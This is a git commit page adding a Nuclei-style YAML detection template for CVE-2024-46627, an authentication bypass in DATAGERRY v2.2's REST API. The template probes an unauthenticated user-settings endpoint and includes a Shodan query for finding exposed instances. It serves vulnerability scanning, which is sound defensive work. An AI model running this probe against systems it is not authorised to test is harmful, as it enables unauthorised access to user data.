Create CVE-2024-46627.yaml
Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>patch-12
parent
d6003d408f
commit
68247faa00
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2024-46627
|
||||
|
||||
info:
|
||||
name: DATAGERRY - REST API Auth Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
|
||||
impact: |
|
||||
Allows unauthorized access to REST API
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-46627
|
||||
- https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.1
|
||||
cve-id: CVE-2024-46627
|
||||
cwe-id: CWE-284
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.16328
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: becon
|
||||
product: datagerry
|
||||
shodan-query:
|
||||
- http.title:"datagerry"
|
||||
tags: cve2024,cve,becon,datagerry,unauth,auth-bypass
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/users/1/settings/'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"response_type":'
|
||||
- '"model":'
|
||||
- '"time":'
|
||||
condition: and
|
Loading…
Reference in New Issue